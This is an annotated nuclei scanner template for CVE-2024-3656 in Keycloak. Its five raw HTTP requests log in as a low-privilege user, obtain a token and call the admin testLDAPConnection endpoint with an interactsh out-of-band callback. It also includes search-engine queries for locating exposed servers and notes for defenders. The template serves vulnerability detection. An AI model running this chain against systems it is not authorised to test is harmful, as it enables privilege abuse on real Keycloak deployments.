# nuclei template for CVE-2024-3656 (Keycloak < 24.0.5, see info.name and the
# Red Hat advisory in the references). The five raw requests below log in as a
# *low-privilege* user — the `username`/`password` variables are operator
# inputs, hence the `authenticated` tag — and then call an admin REST endpoint
# with the resulting token. The negative 403 matcher on the last request is
# what separates a patched instance from a vulnerable one.
id: CVE-2024-3656

info:
  name: Keycloak < 24.0.5 - Broken Access Control
  author: iamnoooob,rootxharsh,pdresearch
  severity: high
  description: |
    A flaw was found in Keycloak. Certain endpoints in Keycloak's admin REST API allow low-privilege users to access administrative functionalities. This flaw allows users to perform actions reserved for administrators, potentially leading to data breaches or system compromise.
  reference:
    - https://cn-sec.com/archives/3262467.html
    - https://github.com/advisories/GHSA-2cww-fgmg-4jqc
    - https://access.redhat.com/errata/RHSA-2024:3575
    - https://access.redhat.com/security/cve/CVE-2024-3656
    - https://bugzilla.redhat.com/show_bug.cgi?id=2274403
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N
    cvss-score: 8.1
    cve-id: CVE-2024-3656
    cwe-id: CWE-200
    epss-score: 0.0007
    epss-percentile: 0.31545
  metadata:
    verified: true
    # one per raw request below; keep in sync if a step is added or removed
    max-request: 5
    vendor: redhat
    product: keycloak
    shodan-query:
      - http.favicon.hash:"-1105083093"
      - http.html:"keycloak"
      - http.title:"keycloak"
    fofa-query:
      - icon_hash=-1105083093
      - body="keycloak"
      - title="keycloak"
    google-query: intitle:"keycloak"
  tags: cve,cve2024,keycloak,auth-bypass,authenticated

variables:
  # credentials of an ordinary (non-admin) realm user, supplied at run time
  username: "{{username}}"
  password: "{{password}}"
  realm: "master"
  # fixed PKCE verifier; code_challenge below is its S256 form
  # (sha256 -> base64url: '/'->'_', '+'->'-', '=' padding stripped)
  code_verifier: "7BhCLfrzYxLzq3XzrfiA8TplZBDciJ0RZepiiDujJKwOaMDzMZWcqGvrCfYH6s735tzxteIUH1vWLP1D2xXm88O9XFEnxcx2"
  code_challenge: "{{ trim_right(replace(replace(base64(hex_decode(sha256(code_verifier))),'/','_'),'+','-'),'=') }}"
  # we can also hardcode code_challenge to wMYxCiAZ5DmiZvqD0h5G_9QwE7IDDFRojvORiaqiTto

# NOTE(review): the raw requests are reproduced exactly as found on the page
# (e.g. the spaces before ':' in the header lines); those look like rendering
# artifacts of this copy rather than the template's intent — compare against
# the upstream signed template before relying on this copy.
http:
  # 1. Start the OIDC authorization-code flow (PKCE, S256) for the admin
  #    console client and pick the login page's tab_id out of the body.
  - raw:
      - |
        GET /realms/{{realm}}/protocol/openid-connect/auth?client_id=security-admin-console&redirect_uri={{Scheme}}%3A%2F%2f{{Hostname}}%2Fadmin%2F{{realm}}%2Fconsole%2F&state=1&response_mode=query&response_type=code&scope=openid&nonce=1&code_challenge_method=S256&code_challenge={{code_challenge}} HTTP/1.1
        Host : {{Hostname}}

    extractors:
      - type: regex
        name: tabid
        part: body
        internal: true
        regex:
          - "&tab_id=(\\w+)&"
        group: 1

  # 2. Load the login form for that tab and extract its action URL for the
  #    credential POST.
  - raw:
      - |
        GET /realms/{{realm}}/login-actions/authenticate?client_id=security-admin-console&tab_id={{tabid}}&client_data=eyJydCI6ImNvZGUiLCJybSI6InF1ZXJ5Iiwic3QiOiIxIn0= HTTP/1.1
        Host : {{Hostname}}

    extractors:
      - type: regex
        name: auth_url
        part: body
        internal: true
        regex:
          - '"login.disabled = true; return true;" action="(.*?)"'
        group: 1

  # 3. Submit the low-privilege credentials. The action URL is HTML-encoded in
  #    the page, hence the &amp; -> & replace. The authorization code is read
  #    from this request's Location header (http_3_location).
  - raw:
      - |
        POST {{replace(auth_url,'&amp;','&')}} HTTP/1.1
        Host : {{Hostname}}
        Content-Type : application/x-www-form-urlencoded
        username={{username}}&password={{password}}&credentialId=&

    extractors:
      - type: dsl
        name: codevalue
        internal: true
        dsl:
          - replace_regex(http_3_location,".*&code=","")

  # 4. Exchange the code (plus the PKCE verifier) for an access token; the
  #    token is pulled from the JSON response body.
  - raw:
      - |
        POST /realms/{{realm}}/protocol/openid-connect/token HTTP/1.1
        Host : {{Hostname}}
        Content-type : application/x-www-form-urlencoded
        code={{codevalue}}&grant_type=authorization_code&client_id=security-admin-console&redirect_uri={{Scheme}}%3A%2F%2F{{Hostname}}%2Fadmin%2F{{realm}}%2Fconsole%2F&code_verifier={{code_verifier}}&

    extractors:
      - type: json
        part: body
        name: access_token
        json:
          - '.access_token'
        internal: true

  # 5. Call an admin-only endpoint with that token. testLDAPConnection is
  #    expected to make the server contact connectionUrl, so a DNS lookup of
  #    the interactsh host is the out-of-band evidence that the request was
  #    accepted; bindDn/bindCredential appear to be inert placeholders.
  #    Defender notes: the observable signals are admin REST calls such as
  #    /admin/realms/<realm>/testLDAPConnection from low-privilege principals
  #    and outbound LDAP connection attempts from the Keycloak host to servers
  #    that are not configured federation providers. The fix is the upgrade
  #    named in info.name / the Red Hat advisory referenced above.
  - raw:
      - |
        POST /admin/realms/{{realm}}/testLDAPConnection HTTP/1.1
        Host : {{Hostname}}
        authorization : Bearer {{access_token}}
        content-type : application/json
        {
        "action": "testConnection" ,
        "connectionUrl": "ldap://{{interactsh-url}}/" ,
        "bindDn": "cn=admin,dc=example,dc=com" ,
        "bindCredential": "password" ,
        "useTruststoreSpi": "ldapsOnly" ,
        "connectionTimeout": "5000"
        }

    # both conditions must hold: an interactsh DNS interaction was observed AND
    # the response is not a 403. If the target cannot resolve external names
    # (egress DNS blocked), the first condition never fires and a vulnerable
    # instance is reported as clean — treat a negative result as inconclusive
    # in such environments.
    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - 'contains(interactsh_protocol, "dns")'
      - type: word
        part: body
        words:
          - 'HTTP 403 Forbidden'
        negative: true

# nuclei's template signature, computed over the original template bytes; it
# will not match this edited/reformatted copy and has to be regenerated if the
# template is to be used as a signed template.
# digest: 4a0a00473045022100fca6e12ccfe96a6531f58841768f9b77a614c9152b88541e3cf76c7cc323501a02204fa65d460da2a2886019b307d6f88ecaa9894a451294c9ee48733896f3a0cba7:922c64590222798bb761d5b6d8e72950